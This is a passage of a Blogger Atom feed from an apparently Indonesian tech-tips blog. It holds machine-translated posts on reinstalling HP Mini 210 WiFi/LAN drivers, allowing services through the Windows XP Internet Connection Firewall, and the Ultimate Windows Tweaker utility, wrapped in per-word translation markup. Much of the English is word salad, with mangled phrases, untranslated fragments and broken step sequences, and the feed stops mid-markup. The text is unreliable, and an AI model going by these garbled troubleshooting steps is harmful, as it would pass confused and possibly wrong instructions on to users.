class="hps"&gt;the first phase&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;:&lt;/span&gt;&lt;br /&gt;&lt;span title="Click for alternate translations" class="hps"&gt;LAN&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Driver&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Install&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Restart&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;------------&gt;&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;first&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;why&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;should&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;not&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;ask for&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;restart&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;restart&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;tuh&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;.&lt;/span&gt;&lt;span title="Click for  alternate translations"&gt;?&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;later&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;wrote&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;that&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;he replied&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;important&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;ge&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;aja&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;obey&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;first&lt;/span&gt;&lt;span title="Click for  alternate translations"&gt;.&lt;/span&gt;&lt;br /&gt;&lt;span title="Click for alternate  translations" class="hps"&gt;After that&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;Install&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;blue&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;tootsnya&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;also&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;-------&gt;&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Restart&lt;/span&gt;&lt;br /&gt; &lt;span title="Click for alternate translations" class="hps"&gt;abis&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;install&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;it&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;again&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;-------&gt;&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;WLAN&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Wi-Fi&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;tohh&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;restart&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;again&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;from&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;here&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;will&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;have&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;already&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;be&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;in&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;good&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;anymore&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;.&lt;/span&gt;&lt;br /&gt;&lt;span title="Click for alternate translations" class="hps"&gt;who&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;have&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;a laptop&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;on&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;the wifi&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;switch&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;off&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps atn"&gt;(&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;tu&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;installed&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;)&lt;/span&gt;&lt;br /&gt;&lt;span title="Click  for alternate translations" class="hps"&gt;nah&lt;/span&gt;&lt;span title="Click  for alternate translations"&gt;'ve&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;already&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;done&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;now&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;can be&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;used&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;again&lt;/span&gt;&lt;span title="Click for  alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;if&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;still&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;not&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;able&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;to&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;Xtramarga@yahoo.com&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;Email&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;aja&lt;/span&gt;&lt;br /&gt;&lt;span title="Click for alternate translations" class="hps"&gt;I&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;do not&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;pay&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;_________&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;aids&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;free&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;online&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;immediately&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;.&lt;/span&gt;&lt;br /&gt;&lt;span title="Click for alternate translations" class="hps"&gt;Well&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;here&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;I&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;jelasin&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;why&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;can not&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;detect the&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;server&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;or&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;server connection&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;in&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;the&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;communications&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;experience&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;corrupt&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;data&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;or&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;damage&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;it&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;causes&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;connection&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;failure&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;continues&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;if&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;for the&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;type of&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;windows&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Vista&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;or&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Win7&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;or&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;more&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;WIN8&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;a&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;newer&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;way&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;remains&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;the same&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;but&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;there are&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;additional&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;see&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;in&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;article&lt;/span&gt;&lt;/span&gt;&lt;a style="font-weight: bold;" href="http://1000trik.blogspot.com/2010/11/aktifkan-services-melewati-icf.html"&gt; AKTIFKAN SERVICES MELEWATI ICF&lt;br /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-6319444777315844588?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/6319444777315844588/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/11/masalah-wifi-lan-pada-hp-mini-210.html#comment-form' title='5 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/6319444777315844588'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/6319444777315844588'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/11/masalah-wifi-lan-pada-hp-mini-210.html' title='MASALAH WIFI LAN PADA HP MINI 210'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-278563770594064942</id><published>2010-11-03T05:03:00.000-07:00</published><updated>2010-12-26T01:28:01.277-08:00</updated><title type='text'>AKTIFKAN SERVICES MELEWATI ICF</title><content type='html'>&lt;span id="result_box" class="long_text" lang="en"&gt;&lt;span title="Click for  alternate translations" class="hps"&gt;There are times when&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;a&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;particular&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;program&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;or&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;service&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;on&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Windows&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;XP&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;machines&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;do not&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;work&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;after&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;you&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;enable&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Internet&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Connection&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Firewall&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps atn"&gt;(&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;ICF&lt;/span&gt;&lt;span title="Click  for alternate translations"&gt;),&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;experienced&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;Internet&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;Explorer&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;yag&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;bit&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;error&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;here&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;I&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;try to&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;review the&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;deal&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;lagi.Untuk&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;yes&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;you just&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;turn on&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;the program&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;or&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;service&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;is&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;to&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;work&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;through&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;a firewall&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span title="Click for alternate translations" class="hps"&gt;How&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;:&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;Click&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;on the&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;control&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;panel&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;right-click&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Network&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;and&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Internet&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Connetions&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;and then&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;click&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Network&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Connections&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;.&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;Right&lt;/span&gt;&lt;span title="Click  for alternate translations"&gt;-click&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;Internet&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;Connections, and&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;then&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;click&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Properties&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;click the&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Advanced&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;tab&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;in the&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Properties&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;dialog&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;box&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span title="Click for alternate translations" class="hps"&gt;click settings&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;and&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;advanced&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;settings&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;dialog&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;box&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;opens&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;.&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;From there&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;you&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;can&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;enable&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;most&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;common&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;services&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;just&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;by&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;clicking on it&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;or&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;add&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;your&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;own&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;made&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;by&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;clicking&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;the add&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;button&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span title="Click for alternate translations" class="hps"&gt;ni&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;hell&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;already&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;long&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;article&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;so&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;I&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;try installing&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;again&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;for&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;the uninitiated&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;, yes&lt;/span&gt;&lt;span title="Click  for alternate translations"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-278563770594064942?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/278563770594064942/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/11/aktifkan-services-melewati-icf.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/278563770594064942'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/278563770594064942'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/11/aktifkan-services-melewati-icf.html' title='AKTIFKAN SERVICES MELEWATI ICF'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-6054699422596129680</id><published>2010-11-01T22:49:00.000-07:00</published><updated>2010-12-26T01:36:51.755-08:00</updated><title type='text'>Tips Optimasi Windows 7</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span id="result_box" class="long_text" lang="en"&gt;&lt;span title="Click for  alternate translations" class="hps"&gt;For&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;users&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;Windows&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;7&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;or&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;Windows&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;Vista&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;and&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;want&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;to change the&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;hidden&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;settings&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;that&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;exist&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;can&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;use the&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;Ultimate&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Windows&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Tweaker&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;.&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;Free&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;and&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;portable&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;tools&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;are&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;used to&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;tweaking&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;and&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;optimization&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;so they can&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;make&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;the operating&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;system&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;becomes&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;more&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;rapid&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;stable&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;and&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;more&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;secure with just a&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;few&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;clicks&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span title="Click for alternate translations" class="hps"&gt;Ultimate&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Windows&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Tweaker&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;will automatically&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;detect&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;whether&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;the&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;use&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;of Windows&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;is Windows&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Vista&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;/&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;Windows&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;7&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;so the&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;choices&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;that appear&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;automatically&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;adjusted&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;.&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;What&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;are&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;the features&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;of this&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;program&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;?&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;a rel="nofollow" href="http://ebsoft.web.id/wp-content/uploads/2009/07/ultimate-windows-tweaker.png" target="_blank"&gt;&lt;img style="width: 424px; height: 284px;" src="http://ebsoft.web.id/wp-content/uploads/2009/07/ultimate-windows-tweaker.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;div style="text-align: justify;"&gt;&lt;span id="result_box" class="long_text" lang="en"&gt;&lt;span style="" title=""&gt;System Information:&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;- Displays  operating system information, version + build number, rating system,  processor, RAM, computer and other descriptions.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;Personalization&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;- Windows Explorer,  various options related to the display / menu in Windows Explorer.&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;- Customize Start Menu, like to hide some menu items and more.&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;- Taskbar Appearance as Disable Aero Peek preview, lock  taksbar, disable windows previews (thumbnails), remove some icons and  other.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;UAC &amp;amp; User Accounts&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;- Change some of the menu at the Welcome Screen&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;- Change the text effects on the Welcome Screen, as well as  background&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;- Some settings in the User Account  Control&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;System Performance&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;- Changing Tooltip display the actual value in milliseconds&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;- Improvement "Action Menu"&lt;br /&gt;&lt;/span&gt;&lt;span style="" 